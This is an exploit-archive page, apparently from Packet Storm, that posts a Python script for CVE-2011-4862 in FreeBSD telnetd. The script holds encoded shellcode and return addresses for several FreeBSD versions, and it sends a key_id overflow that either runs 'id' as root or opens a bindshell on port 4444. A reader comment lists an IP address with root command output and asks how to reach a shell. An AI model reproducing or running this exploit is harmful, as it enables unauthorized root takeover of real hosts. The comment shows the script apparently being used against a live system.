what you don't know can hurt you

FreeBSD telnetd Remote Root

FreeBSD telnetd Remote Root
Posted Jan 16, 2012
Authored by knull | Site leethack.info

This python script tests for the remote root vulnerability in encryption support for telnetd on FreeBSD systems.

tags | exploit, remote, root, python
systems | freebsd
advisories | CVE-2011-4862
MD5 | 9336a7d20f740a0088cc23c558102714

FreeBSD telnetd Remote Root

Change Mirror Download
#!/usr/bin/env python
# Checks/exploits CVE-2011-4862 (remote root in encryption supporting telnetd) in multiple FreeBSD versions.
# Author: Knull of http://leethack.info
# References:
# Metasploit module, http://www.metasploit.com/modules/exploit/freebsd/telnet/telnet_encrypt_keyid
# FreeBSD advisory, http://lists.freebsd.org/pipermail/freebsd-announce/2011-December/001398.html

import random, string, struct, socket, time, sys

def usage():

print "Usage: " + sys.argv[0] + " [Option] host\n\nOptions: \n -c\tcheck if telnetd is vulnerable and running as root (runs command `id` on host)\n -e\texploit host (opens a bindshell on port 4444)\n"

if len(sys.argv) == 3:
host = sys.argv[2].rstrip()
port = 23
if sys.argv[1] == '-c':
# slightly modified version of metasploits bsd/x86/exec:
#
# bsd/x86/exec - 71 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# AppendExit=false, CMD=id, PrependSetresuid=false,
# PrependSetuid=false, VERBOSE=false, PrependSetreuid=false
buf = "\xda\xd0\xb8\x7b\x91\x45\xc5\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x0c\x31\x45\x17\x03\x45\x17\x83\x96\x6d\xa7\x30\x02\xb5\x70\x22\x80\xa1\xad\x37\x24\x32\x27\x50\x76\x5a\x59\xb0\x05\xf2\xcd\xe1\xc6\x60\x67\x77\xfb\x37\x9f\x84\xfb\xb7\x5f\xe2\x9f\xb7\x08\xa7\xd6\x59\xe4\x16\xbb\xc9\xc4\x19"
elif sys.argv[1] == '-e':
# slightly modified version of metasploits bsd/x86/shell_bind_tcp:
#
# bsd/x86/shell_bind_tcp - 100 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# AutoRunScript=, AppendExit=false, PrependSetresuid=false,
# InitialAutoRunScript=, PrependSetuid=false, LPORT=4444,
# VERBOSE=false, RHOST=, PrependSetreuid=false
buf = "\xda\xc8\xbe\x7b\xd4\xea\x14\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x13\x31\x70\x18\x83\xc0\x04\x03\x70\x6f\x36\x1f\x25\x4f\xe6\x88\xb9\x4d\x16\x15\xcf\xb6\x48\xcf\xce\x52\x6b\x65\xc1\x12\x0a\xb4\x61\x05\x9d\x16\x08\xc1\x45\x5a\x4c\x98\x31\x88\xfd\xf0\x70\xd0\x4e\x1a\x46\x51\xfe\x72\x32\x08\xa7\xbf\x42\x53\x18\xdb\x3a\x5a\xf7\x4b\x92\x8d\x8b\xe3\x84\xfe\x09\x9a\x3a\x88\x2d\x0c\x97\xd9\xe1\x1c\x2c\x13\x81"
else:
usage()
exit()
else:
usage()
exit()


socket.setdefaulttimeout(10)
rg = random.SystemRandom()
alnum = string.letters[0:52] + string.digits

def rand_alnumlst(length):
return list(''.join(rg.choice(alnum) for _ in range(length)))

enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
enc_keyid = "\xff\xfa\x26\x07"
end_suboption = "\xff\xf0"

# ret values for multiple FreeBSD versions
rets = 0x0804a8a9, 0x0804a889, 0x0804a869, 0x08057bd0, 0x0804c4e0, 0x0804a5b4, 0x08052925, 0x0804cf31, 0x8059730
version = '8.2', '8.1', '8.0', '7.3/7.4', '7.0/7.1/7.2', '6.3/6.4', '6.0/6.1/6.2', '5.5', '5.3'

# display banner
print "Vulnerability checker/exploit for CVE-2011-4862 (FreeBSD telnetd encryption)"
print "by Knull, http://leethack.info\n"

count = 0
tried = 0

# loop through the ret's until one works
for ret in rets:

key_id = rand_alnumlst(400)
key_id[0:1] = "\xeb\x76"
key_id[72:75] = struct.pack('<I', ret - 20)
key_id[76:79] = struct.pack('<I', ret)
key_id[80:191] = rand_alnumlst(112)
key_id[120:121] = "\xeb\x46"
key_id[192:191+len(buf)] = buf

s = ''
for i in key_id:
s += ''.join(i)

sploit = enc_keyid + s + end_suboption

print "Trying FreeBSD " + version[count] + "...\n"

try:

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock.send(enc_init)
data = sock.recv(32)

sock.send(sploit)
data = sock.recv(32)
time.sleep(0.5)

if data:

sock.send(sploit)
time.sleep(0.5)

if sys.argv[1] == '-e':
tried = 1
sock.close()

elif sys.argv[1] == '-c':
result = sock.recv(128)
sock.close()

if result.find("root") != -1:
print host + " is vulnerable, result of command: id\n" + result
exit()

sock.close()

except socket.error:
pass

count+=1

if tried:
print "Sent payloads, check bindshell on " + host + ", port 4444\n"

Comments (1)

RSS Feed Subscribe to this comment feed
dilimake

198.106.149.87 is vulnerable, result of command: id
0Wÿðuid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

but .. how .. make a connection on this .. root ? i try -e .. but don`t work :-s

Comment by dilimake
2012-01-28 19:11:38 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    15 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close